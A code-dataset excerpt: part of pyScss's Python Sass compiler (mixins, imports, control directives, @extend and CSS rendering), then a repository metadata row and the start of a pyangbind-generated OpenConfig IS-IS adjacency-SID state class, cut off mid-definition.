callee_argspec = mixin[4]
import_key = mixin[5]
callee_calculator = self._make_calculator(callee_namespace)
# Populate the mixin/function's namespace with its arguments
for var_name, node in callee_argspec.iter_def_argspec():
if args:
# If there are positional arguments left, use the first
value = args.pop(0)
elif var_name in kwargs:
# Try keyword arguments
value = kwargs.pop(var_name)
elif node is not None:
# OK, try the default argument. Using callee_calculator means
# that default values of arguments can refer to earlier
# arguments' values; yes, that is how Sass works.
value = node.evaluate(callee_calculator, divide=True)
else:
# TODO this should raise
value = Undefined()
callee_namespace.set_variable(var_name, value, local_only=True)
if callee_argspec.slurp:
# Slurpy var gets whatever is left
# TODO should preserve the order of extra kwargs
sass_kwargs = []
for key, value in kwargs.items():
sass_kwargs.append((String(key[1:]), value))
callee_namespace.set_variable(
callee_argspec.slurp.name,
Arglist(args, sass_kwargs))
args = []
kwargs = {}
elif callee_argspec.inject:
# Callee namespace gets all the extra kwargs whether declared or
# not
for var_name, value in kwargs.items():
callee_namespace.set_variable(var_name, value, local_only=True)
kwargs = {}
# TODO would be nice to say where the mixin/function came from
if kwargs:
raise NameError("%s has no such argument %s" % (name, kwargs.keys()[0]))
if args:
raise NameError("%s received extra arguments: %r" % (name, args))
pristine_callee_namespace.use_import(import_key)
return callee_namespace
# @print_timing(10)
def _at_function(self, calculator, rule, scope, block):
"""
Implements @mixin and @function
"""
if not block.argument:
raise SyntaxError("%s requires a function name (%s)" % (block.directive, rule.file_and_line))
funct, argspec_node = self._get_funct_def(rule, calculator, block.argument)
defaults = {}
new_params = []
for var_name, default in argspec_node.iter_def_argspec():
new_params.append(var_name)
if default is not None:
defaults[var_name] = default
# TODO a function or mixin is re-parsed every time it's called; there's
# no AST for anything but expressions :(
mixin = [rule.source_file, block.lineno, block.unparsed_contents, rule.namespace, argspec_node, rule.source_file]
if block.directive == '@function':
def _call(mixin):
def __call(namespace, *args, **kwargs):
source_file = mixin[0]
lineno = mixin[1]
m_codestr = mixin[2]
pristine_callee_namespace = mixin[3]
callee_namespace = pristine_callee_namespace.derive()
# TODO CallOp converts Sass names to Python names, so we
# have to convert them back to Sass names. would be nice
# to avoid this back-and-forth somehow
kwargs = OrderedDict(
(normalize_var('$' + key), value)
for (key, value) in kwargs.items())
self._populate_namespace_from_call(
"Function {0}".format(funct),
callee_namespace, mixin, args, kwargs)
_rule = SassRule(
source_file=source_file,
lineno=lineno,
unparsed_contents=m_codestr,
namespace=callee_namespace,
# rule
import_key=rule.import_key,
legacy_compiler_options=rule.legacy_compiler_options,
options=rule.options,
properties=rule.properties,
extends_selectors=rule.extends_selectors,
ancestry=rule.ancestry,
nested=rule.nested,
)
# TODO supposed to throw an error if there's a slurpy arg
# but keywords() is never called on it
try:
self.manage_children(_rule, scope)
except SassReturn as e:
return e.retval
else:
return Null()
return __call
_mixin = _call(mixin)
_mixin.mixin = mixin
mixin = _mixin
if block.directive == '@mixin':
add = rule.namespace.set_mixin
elif block.directive == '@function':
add = rule.namespace.set_function
# Register the mixin for every possible arity it takes
if argspec_node.slurp or argspec_node.inject:
add(funct, None, mixin)
else:
while len(new_params):
add(funct, len(new_params), mixin)
param = new_params.pop()
if param not in defaults:
break
if not new_params:
add(funct, 0, mixin)
_at_mixin = _at_function
# @print_timing(10)
def _at_include(self, calculator, rule, scope, block):
"""
Implements @include, for @mixins
"""
caller_namespace = rule.namespace
caller_calculator = self._make_calculator(caller_namespace)
funct, caller_argspec = self._get_funct_def(rule, caller_calculator, block.argument)
# Render the passed arguments, using the caller's namespace
args, kwargs = caller_argspec.evaluate_call_args(caller_calculator)
argc = len(args) + len(kwargs)
try:
mixin = caller_namespace.mixin(funct, argc)
except KeyError:
try:
# TODO maybe? don't do this, once '...' works
# Fallback to single parameter:
mixin = caller_namespace.mixin(funct, 1)
except KeyError:
log.error("Mixin not found: %s:%d (%s)", funct, argc, rule.file_and_line, extra={'stack': True})
return
else:
args = [List(args, use_comma=True)]
# TODO what happens to kwargs?
source_file = mixin[0]
lineno = mixin[1]
m_codestr = mixin[2]
pristine_callee_namespace = mixin[3]
callee_argspec = mixin[4]
if caller_argspec.inject and callee_argspec.inject:
# DEVIATION: Pass the ENTIRE local namespace to the mixin (yikes)
callee_namespace = Namespace.derive_from(
caller_namespace,
pristine_callee_namespace)
else:
callee_namespace = pristine_callee_namespace.derive()
self._populate_namespace_from_call(
"Mixin {0}".format(funct),
callee_namespace, mixin, args, kwargs)
_rule = SassRule(
# These must be file and line in which the @include occurs
source_file=rule.source_file,
lineno=rule.lineno,
# These must be file and line in which the @mixin was defined
from_source_file=source_file,
from_lineno=lineno,
unparsed_contents=m_codestr,
namespace=callee_namespace,
# rule
import_key=rule.import_key,
legacy_compiler_options=rule.legacy_compiler_options,
options=rule.options,
properties=rule.properties,
extends_selectors=rule.extends_selectors,
ancestry=rule.ancestry,
nested=rule.nested,
)
_rule.options['@content'] = block.unparsed_contents
self.manage_children(_rule, scope)
# @print_timing(10)
def _at_content(self, calculator, rule, scope, block):
"""
Implements @content
"""
if '@content' not in rule.options:
log.error("Content string not found for @content (%s)", rule.file_and_line)
rule.unparsed_contents = rule.options.pop('@content', '')
self.manage_children(rule, scope)
# @print_timing(10)
def _at_import(self, calculator, rule, scope, block):
"""
Implements @import
Load and import mixins and functions and rules
"""
# TODO it would be neat to opt into warning that you're using
# values/functions from a file you didn't explicitly import
# TODO base-level directives, like @mixin or @charset, aren't allowed
# to be @imported into a nested block
# TODO i'm not sure we disallow them nested in the first place
# TODO @import is disallowed within mixins, control directives
# TODO @import doesn't take a block -- that's probably an issue with a
# lot of our directives
# TODO if there's any #{}-interpolation in the AST, this should become
# a CSS import (though in practice Ruby only even evaluates it in url()
# -- in a string it's literal!)
sass_paths = calculator.evaluate_expression(block.argument)
css_imports = []
for sass_path in sass_paths:
# These are the rules for when an @import is interpreted as a CSS
# import:
if (
# If it's a url()
isinstance(sass_path, Url) or
# If it's not a string (including `"foo" screen`, a List)
not isinstance(sass_path, String) or
# If the filename begins with an http protocol
sass_path.value.startswith(('http://', 'https://')) or
# If the filename ends with .css
sass_path.value.endswith(self.compiler.static_extensions)):
css_imports.append(sass_path.render(compress=False))
continue
# Should be left with a plain String
name = sass_path.value
source = None
for extension in self.compiler.extensions:
source = extension.handle_import(name, self, rule)
if source:
break
else:
# Didn't find anything!
raise SassImportError(name, self.compiler, rule=rule)
source = self.add_source(source)
if rule.namespace.has_import(source):
# If already imported in this scope, skip
# TODO this might not be right -- consider if you @import a
# file at top level, then @import it inside a selector block!
continue
_rule = SassRule(
source_file=source,
lineno=block.lineno,
unparsed_contents=source.contents,
# rule
legacy_compiler_options=rule.legacy_compiler_options,
options=rule.options,
properties=rule.properties,
extends_selectors=rule.extends_selectors,
ancestry=rule.ancestry,
namespace=rule.namespace,
)
rule.namespace.add_import(source, rule)
self.manage_children(_rule, scope)
# Create a new @import rule for each import determined to be CSS
for import_ in css_imports:
# TODO this seems extremely janky (surely we should create an
# actual new Rule), but the CSS rendering doesn't understand how to
# print rules without blocks
# TODO if this ever creates a new Rule, shuffle stuff around so
# this is still hoisted to the top
rule.properties.append(('@import ' + import_, None))
# @print_timing(10)
def _at_if(self, calculator, rule, scope, block):
"""
Implements @if and @else if
"""
# "@if" indicates whether any kind of `if` since the last `@else` has
# succeeded, in which case `@else if` should be skipped
if block.directive != '@if':
if '@if' not in rule.options:
raise SyntaxError("@else with no @if (%s)" % (rule.file_and_line,))
if rule.options['@if']:
# Last @if succeeded; stop here
return
condition = calculator.calculate(block.argument)
if condition:
inner_rule = rule.copy()
inner_rule.unparsed_contents = block.unparsed_contents
if not self.should_scope_loop_in_rule(inner_rule):
# DEVIATION: Allow not creating a new namespace
inner_rule.namespace = rule.namespace
self.manage_children(inner_rule, scope)
rule.options['@if'] = condition
_at_else_if = _at_if
# @print_timing(10)
def _at_else(self, calculator, rule, scope, block):
"""
Implements @else
"""
if '@if' not in rule.options:
log.error("@else with no @if (%s)", rule.file_and_line)
val = rule.options.pop('@if', True)
if not val:
inner_rule = rule.copy()
inner_rule.unparsed_contents = block.unparsed_contents
inner_rule.namespace = rule.namespace # DEVIATION: Commenting this line gives the Sass bahavior
inner_rule.unparsed_contents = block.unparsed_contents
self.manage_children(inner_rule, scope)
# @print_timing(10)
def _at_for(self, calculator, rule, scope, block):
"""
Implements @for
"""
var, _, name = block.argument.partition(' from ')
frm, _, through = name.partition(' through ')
if through:
inclusive = True
else:
inclusive = False
frm, _, through = frm.partition(' to ')
frm = calculator.calculate(frm)
through = calculator.calculate(through)
try:
frm = int(float(frm))
through = int(float(through))
except ValueError:
return
if frm > through:
# DEVIATION: allow reversed '@for .. from .. through' (same as enumerate() and range())
frm, through = through, frm
rev = reversed
else:
rev = lambda x: x
var = var.strip()
var = calculator.do_glob_math(var)
var = normalize_var(var)
inner_rule = rule.copy()
inner_rule.unparsed_contents = block.unparsed_contents
if not self.should_scope_loop_in_rule(inner_rule):
# DEVIATION: Allow not creating a new namespace
inner_rule.namespace = rule.namespace
if inclusive:
through += 1
for i in rev(range(frm, through)):
inner_rule.namespace.set_variable(var, Number(i))
self.manage_children(inner_rule, scope)
# @print_timing(10)
def _at_each(self, calculator, rule, scope, block):
"""
Implements @each
"""
varstring, _, valuestring = block.argument.partition(' in ')
values = calculator.calculate(valuestring)
if not values:
return
varlist = [
normalize_var(calculator.do_glob_math(var.strip()))
# TODO use list parsing here
for var in varstring.split(",")
]
# `@each $foo, in $bar` unpacks, but `@each $foo in $bar` does not!
unpack = len(varlist) > 1
if not varlist[-1]:
varlist.pop()
inner_rule = rule.copy()
inner_rule.unparsed_contents = block.unparsed_contents
if not self.should_scope_loop_in_rule(inner_rule):
# DEVIATION: Allow not creating a new namespace
inner_rule.namespace = rule.namespace
for v in List.from_maybe(values):
if unpack:
v = List.from_maybe(v)
for i, var in enumerate(varlist):
if i >= len(v):
value = Null()
else:
value = v[i]
inner_rule.namespace.set_variable(var, value)
else:
inner_rule.namespace.set_variable(varlist[0], v)
self.manage_children(inner_rule, scope)
# @print_timing(10)
def _at_while(self, calculator, rule, scope, block):
"""
Implements @while
"""
first_condition = condition = calculator.calculate(block.argument)
while condition:
inner_rule = rule.copy()
inner_rule.unparsed_contents = block.unparsed_contents
if not self.should_scope_loop_in_rule(inner_rule):
# DEVIATION: Allow not creating a new namespace
inner_rule.namespace = rule.namespace
self.manage_children(inner_rule, scope)
condition = calculator.calculate(block.argument)
rule.options['@if'] = first_condition
# @print_timing(10)
def _at_variables(self, calculator, rule, scope, block):
"""
Implements @variables and @vars
"""
warn_deprecated(
rule,
"@variables and @vars are deprecated. "
"Just assign variables at top-level.")
_rule = rule.copy()
_rule.unparsed_contents = block.unparsed_contents
_rule.namespace = rule.namespace
_rule.properties = []
self.manage_children(_rule, scope)
_at_vars = _at_variables
# @print_timing(10)
def _get_properties(self, rule, scope, block):
"""
Implements properties and variables extraction and assignment
"""
prop, raw_value = (_prop_split_re.split(block.prop, 1) + [None])[:2]
if raw_value is not None:
raw_value = raw_value.strip()
try:
is_var = (block.prop[len(prop)] == '=')
except IndexError:
is_var = False
if is_var:
warn_deprecated(rule, "Assignment with = is deprecated; use : instead.")
calculator = self._make_calculator(rule.namespace)
prop = prop.strip()
prop = calculator.do_glob_math(prop)
if not prop:
return
_prop = (scope or '') + prop
if is_var or prop.startswith('$') and raw_value is not None:
# Pop off any flags: !default, !global
is_default = False
is_global = True # eventually sass will default this to false
while True:
splits = raw_value.rsplit(None, 1)
if len(splits) < 2 or not splits[1].startswith('!'):
break
raw_value, flag = splits
if flag == '!default':
is_default = True
elif flag == '!global':
is_global = True
else:
raise ValueError("Unrecognized flag: {0}".format(flag))
# Variable assignment
_prop = normalize_var(_prop)
try:
existing_value = rule.namespace.variable(_prop)
except KeyError:
existing_value = None
is_defined = existing_value is not None and not existing_value.is_null
if is_default and is_defined:
pass
else:
if is_defined and prop.startswith('$') and prop[1].isupper():
log.warn("Constant %r redefined", prop)
# Variable assignment is an expression, so it always performs
# real division
value = calculator.calculate(raw_value, divide=True)
rule.namespace.set_variable(
_prop, value, local_only=not is_global)
else:
# Regular property destined for output
_prop = calculator.apply_vars(_prop)
if raw_value is None:
value = None
else:
value = calculator.calculate(raw_value)
if value is None:
pass
elif isinstance(value, six.string_types):
# TODO kill this branch
pass
else:
style = rule.legacy_compiler_options.get(
'style', self.compiler.output_style)
compress = style == 'compressed'
value = value.render(compress=compress)
rule.properties.append((_prop, value))
# @print_timing(10)
def _nest_at_rules(self, rule, scope, block):
"""
Implements @-blocks
"""
# TODO handle @charset, probably?
# Interpolate the current block
# TODO this seems like it should be done in the block header. and more
# generally?
calculator = self._make_calculator(rule.namespace)
if block.header.argument:
# TODO is this correct? do ALL at-rules ALWAYS allow both vars and
# interpolation?
node = calculator.parse_vars_and_interpolations(
block.header.argument)
block.header.argument = node.evaluate(calculator).render()
# TODO merge into RuleAncestry
new_ancestry = list(rule.ancestry.headers)
if block.directive == '@media' and new_ancestry:
for i, header in reversed(list(enumerate(new_ancestry))):
if header.is_selector:
continue
elif header.directive == '@media':
new_ancestry[i] = BlockAtRuleHeader(
'@media',
"%s and %s" % (header.argument, block.argument))
break
else:
new_ancestry.insert(i, block.header)
else:
new_ancestry.insert(0, block.header)
else:
new_ancestry.append(block.header)
rule.descendants += 1
new_rule = SassRule(
source_file=rule.source_file,
import_key=rule.import_key,
lineno=block.lineno,
num_header_lines=block.header.num_lines,
unparsed_contents=block.unparsed_contents,
legacy_compiler_options=rule.legacy_compiler_options,
options=rule.options.copy(),
#properties
#extends_selectors
ancestry=RuleAncestry(new_ancestry),
namespace=rule.namespace.derive(),
nested=rule.nested + 1,
)
self.rules.append(new_rule)
rule.namespace.use_import(rule.source_file)
self.manage_children(new_rule, scope)
self._warn_unused_imports(new_rule)
# @print_timing(10)
def _nest_rules(self, rule, scope, block):
"""
Implements Nested CSS rules
"""
calculator = self._make_calculator(rule.namespace)
raw_selectors = calculator.do_glob_math(block.prop)
# DEVIATION: ruby sass doesn't support bare variables in selectors
raw_selectors = calculator.apply_vars(raw_selectors)
c_selectors, c_parents = self.parse_selectors(raw_selectors)
if c_parents:
warn_deprecated(
rule,
"The XCSS 'a extends b' syntax is deprecated. "
"Use 'a { @extend b; }' instead."
)
new_ancestry = rule.ancestry.with_nested_selectors(c_selectors)
rule.descendants += 1
new_rule = SassRule(
source_file=rule.source_file,
import_key=rule.import_key,
lineno=block.lineno,
num_header_lines=block.header.num_lines,
unparsed_contents=block.unparsed_contents,
legacy_compiler_options=rule.legacy_compiler_options,
options=rule.options.copy(),
#properties
extends_selectors=c_parents,
ancestry=new_ancestry,
namespace=rule.namespace.derive(),
nested=rule.nested + 1,
)
self.rules.append(new_rule)
rule.namespace.use_import(rule.source_file)
self.manage_children(new_rule, scope)
self._warn_unused_imports(new_rule)
# @print_timing(3)
def apply_extends(self, rules):
"""Run through the given rules and translate all the pending @extends
declarations into real selectors on parent rules.
The list is modified in-place and also sorted in dependency order.
"""
# Game plan: for each rule that has an @extend, add its selectors to
# every rule that matches that @extend.
# First, rig a way to find arbitrary selectors quickly. Most selectors
# revolve around elements, classes, and IDs, so parse those out and use
# them as a rough key. Ignore order and duplication for now.
key_to_selectors = defaultdict(set)
selector_to_rules = defaultdict(set)
rule_selector_order = {}
order = 0
for rule in rules:
for selector in rule.selectors:
for key in selector.lookup_key():
key_to_selectors[key].add(selector)
selector_to_rules[selector].add(rule)
rule_selector_order[rule, selector] = order
order += 1
# Now go through all the rules with an @extends and find their parent
# rules.
for rule in rules:
for selector in rule.extends_selectors:
# This is a little dirty. intersection isn't a class method.
# Don't think about it too much.
candidates = set.intersection(*(
key_to_selectors[key] for key in selector.lookup_key()))
extendable_selectors = [
candidate for candidate in candidates
if candidate.is_superset_of(selector)]
if not extendable_selectors:
# TODO implement !optional
warn_deprecated(
rule,
"Can't find any matching rules to extend {0!r} -- this "
"will be fatal in 2.0, unless !optional is specified!"
.format(selector.render()))
continue
# Armed with a set of selectors that this rule can extend, do
# some substitution and modify the appropriate parent rules.
# One tricky bit: it's possible we're extending two selectors
# that both exist in the same parent rule, in which case we
# want to extend in the order the original selectors appear in
# that rule.
known_parents = []
for extendable_selector in extendable_selectors:
parent_rules = selector_to_rules[extendable_selector]
for parent_rule in parent_rules:
if parent_rule is rule:
# Don't extend oneself
continue
known_parents.append(
(parent_rule, extendable_selector))
# This will put our parents back in their original order
known_parents.sort(key=rule_selector_order.__getitem__)
for parent_rule, extendable_selector in known_parents:
more_parent_selectors = []
for rule_selector in rule.selectors:
more_parent_selectors.extend(
extendable_selector.substitute(
selector, rule_selector))
for parent in more_parent_selectors:
# Update indices, in case later rules try to extend
# this one
for key in parent.lookup_key():
key_to_selectors[key].add(parent)
selector_to_rules[parent].add(parent_rule)
rule_selector_order[parent_rule, parent] = order
order += 1
parent_rule.ancestry = (
parent_rule.ancestry.with_more_selectors(
more_parent_selectors))
# Remove placeholder-only rules
return [rule for rule in rules if not rule.is_pure_placeholder]
# @print_timing(3)
def parse_properties(self):
css_files = []
seen_files = set()
rules_by_file = {}
for rule in self.rules:
source_file = rule.source_file
rules_by_file.setdefault(source_file, []).append(rule)
if rule.is_empty:
continue
if source_file not in seen_files:
seen_files.add(source_file)
css_files.append(source_file)
return rules_by_file, css_files
# @print_timing(3)
def create_css(self, rules):
"""
Generate the final CSS string
"""
style = rules[0].legacy_compiler_options.get(
'style', self.compiler.output_style)
debug_info = self.compiler.generate_source_map
if style == 'legacy':
sc, sp, tb, nst, srnl, nl, rnl, lnl, dbg = True, ' ', ' ', False, '', '\n', '\n', '\n', debug_info
elif style == 'compressed':
sc, sp, tb, nst, srnl, nl, rnl, lnl, dbg = False, '', '', False, '', '', '', '', False
elif style == 'compact':
sc, sp, tb, nst, srnl, nl, rnl, lnl, dbg = True, ' ', '', False, '\n', ' ', '\n', ' ', debug_info
elif style == 'expanded':
sc, sp, tb, nst, srnl, nl, rnl, lnl, dbg = True, ' ', ' ', False, '\n', '\n', '\n', '\n', debug_info
else: # if style == 'nested':
sc, sp, tb, nst, srnl, nl, rnl, lnl, dbg = True, ' ', ' ', True, '\n', '\n', '\n', ' ', debug_info
return self._create_css(rules, sc, sp, tb, nst, srnl, nl, rnl, lnl, dbg)
def _textwrap(self, txt, width=70):
if not hasattr(self, '_textwrap_wordsep_re'):
self._textwrap_wordsep_re = re.compile(r'(?<=,)\s+')
self._textwrap_strings_re = re.compile(r'''(["'])(?:(?!\1)[^\\]|\\.)*\1''')
# First, remove commas from anything within strings (marking commas as \0):
def _repl(m):
ori = m.group(0)
fin = ori.replace(',', '\0')
if ori != fin:
subs[fin] = ori
return fin
subs = {}
txt = self._textwrap_strings_re.sub(_repl, txt)
# Mark split points for word separators using (marking spaces with \1):
txt = self._textwrap_wordsep_re.sub('\1', txt)
# Replace all the strings back:
for fin, ori in subs.items():
txt = txt.replace(fin, ori)
# Split in chunks:
chunks = txt.split('\1')
# Break in lines of at most long_width width appending chunks:
ln = ''
lines = []
long_width = int(width * 1.2)
for chunk in chunks:
_ln = ln + ' ' if ln else ''
_ln += chunk
if len(ln) >= width or len(_ln) >= long_width:
if ln:
lines.append(ln)
_ln = chunk
ln = _ln
if ln:
lines.append(ln)
return lines
def _create_css(self, rules, sc=True, sp=' ', tb=' ', nst=True, srnl='\n', nl='\n', rnl='\n', lnl='', debug_info=False):
super_selector = self.compiler.super_selector
if super_selector:
super_selector += ' '
skip_selectors = False
prev_ancestry_headers = []
total_rules = 0
total_selectors = 0
result = ''
dangling_property = False
separate = False
nesting = current_nesting = last_nesting = -1 if nst else 0
nesting_stack = []
for rule in rules:
nested = rule.nested
if nested <= 1:
separate = True
if nst:
last_nesting = current_nesting
current_nesting = nested
delta_nesting = current_nesting - last_nesting
if delta_nesting > 0:
nesting_stack += [nesting] * delta_nesting
elif delta_nesting < 0:
nesting_stack = nesting_stack[:delta_nesting]
nesting = nesting_stack[-1]
if rule.is_empty:
continue
if nst:
nesting += 1
ancestry = rule.ancestry
ancestry_len = len(ancestry)
first_mismatch = 0
for i, (old_header, new_header) in enumerate(zip(prev_ancestry_headers, ancestry.headers)):
if old_header != new_header:
first_mismatch = i
break
# When sc is False, sets of properties are printed without a
# trailing semicolon. If the previous block isn't being closed,
# that trailing semicolon needs adding in to separate the last
# property from the next rule.
if not sc and dangling_property and first_mismatch >= len(prev_ancestry_headers):
result += ';'
# Close blocks and outdent as necessary
for i in range(len(prev_ancestry_headers), first_mismatch, -1):
result += tb * (i - 1) + '}' + rnl
# Open new blocks as necessary
for i in range(first_mismatch, ancestry_len):
header = ancestry.headers[i]
if separate:
if result:
result += srnl
separate = False
if debug_info:
def _print_debug_info(filename, lineno):
if debug_info == 'comments':
result = tb * (i + nesting) + "/* file: %s, line: %s */" % (filename, lineno) + nl
else:
filename = _escape_chars_re.sub(r'\\\1', filename)
result = tb * (i + nesting) + "@media -sass-debug-info{filename{font-family:file\:\/\/%s}line{font-family:\\00003%s}}" % (filename, lineno) + nl
return result
if rule.lineno and rule.source_file:
result += _print_debug_info(rule.source_file.path, rule.lineno)
if rule.from_lineno and rule.from_source_file:
result += _print_debug_info(rule.from_source_file.path, rule.from_lineno)
if header.is_selector:
header_string = header.render(sep=',' + sp, super_selector=super_selector)
if nl:
header_string = (nl + tb * (i + nesting)).join(self._textwrap(header_string))
else:
header_string = header.render()
result += tb * (i + nesting) + header_string + sp + '{' + nl
total_rules += 1
if header.is_selector:
total_selectors += 1
prev_ancestry_headers = ancestry.headers
dangling_property = False
if not skip_selectors:
result += self._print_properties(rule.properties, sc, sp, tb * (ancestry_len + nesting), nl, lnl)
dangling_property = True
# Close all remaining blocks
for i in reversed(range(len(prev_ancestry_headers))):
result += tb * i + '}' + rnl
# Always end with a newline, even in compressed mode
if not result.endswith('\n'):
result += '\n'
return (result, total_rules, total_selectors)
def _print_properties(self, properties, sc=True, sp=' ', tb='', nl='\n', lnl=' '):
result = ''
last_prop_index = len(properties) - 1
for i, (name, value) in enumerate(properties):
if value is None:
prop = name
elif value:
if nl:
value = (nl + tb + tb).join(self._textwrap(value))
prop = name + ':' + sp + value
else:
# Empty string means there's supposed to be a value but it
# evaluated to nothing; skip this
# TODO interacts poorly with last_prop_index
continue
if i == last_prop_index:
if sc:
result += tb + prop + ';' + lnl
else:
result += tb + prop + lnl
else:
result += tb + prop + ';' + nl
return result
class SassReturn(SassBaseError):
"""Special control-flow exception used to hop up the stack from a Sass
function's ``@return``.
"""
def __init__(self, retval):
super(SassReturn, self).__init__()
self.retval = retval
def __str__(self):
return "Returning {0!r}".format(self.retval)
|
hashamali/pyScss
|
scss/compiler.py
|
Python
|
mit
| 59,822 | 0.000953 |
# -*- coding: utf-8 -*-
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from collections import OrderedDict
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
elif six.PY2:
import __builtin__
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/isis/levels/level/link-state-database/lsp/tlvs/tlv/mt-isn/neighbors/neighbor/subTLVs/subTLVs/adjacency-sid/sid/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: State parameters of Adjacency-SID.
"""
__slots__ = ("_path_helper", "_extmethods", "__value", "__flags", "__weight")
_yang_name = "state"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__value = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="value",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
self.__flags = YANGDynClass(
base=TypedListType(
allowed_type=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"ADDRESS_FAMILY": {},
"BACKUP": {},
"VALUE": {},
"LOCAL": {},
"SET": {},
},
)
),
is_leaf=False,
yang_name="flags",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="enumeration",
is_config=False,
)
self.__weight = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
is_leaf=True,
yang_name="weight",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"isis",
"levels",
"level",
"link-state-database",
"lsp",
"tlvs",
"tlv",
"mt-isn",
"neighbors",
"neighbor",
"subTLVs",
"subTLVs",
"adjacency-sid",
"sid",
"state",
]
def _get_value(self):
"""
Getter method for value, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/value (uint32)
YANG Description: Adjacency-SID value.
"""
return self.__value
def _set_value(self, v, load=False):
"""
Setter method for value, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/value (uint32)
If this variable is read-only (config: false) in the
source YANG file, then _set_value is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_value() directly.
YANG Description: Adjacency-SID value.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="value",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """value must be of a type compatible with uint32""",
"defined-type": "uint32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="value", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint32', is_config=False)""",
}
)
self.__value = t
if hasattr(self, "_set"):
self._set()
def _unset_value(self):
self.__value = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="value",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint32",
is_config=False,
)
def _get_flags(self):
"""
Getter method for flags, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/flags (enumeration)
YANG Description: Flags associated with Adj-Segment-ID.
"""
return self.__flags
def _set_flags(self, v, load=False):
"""
Setter method for flags, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/levels/level/link_state_database/lsp/tlvs/tlv/mt_isn/neighbors/neighbor/subTLVs/subTLVs/adjacency_sid/sid/state/flags (enumeration)
If this variable is read-only (config: false) in the
source YANG file, then _set_flags is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_flags() directly.
YANG Description: Flags associated with Adj-Segment-ID.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=TypedListType(
allowed_type=RestrictedClassType(
base_type=six.text_type,
restriction_type="dict_key",
restriction_arg={
"ADDRESS_FAMILY": {},
"BACKUP": {},
"VALUE": {},
"LOCAL": {},
"SET": {},
},
)
),
is_leaf=False,
yang_name="flags",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="enumeration",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """flags must be of a type compatible with enumeration""",
"defined-type": "openconfig-network-instance:enumeration",
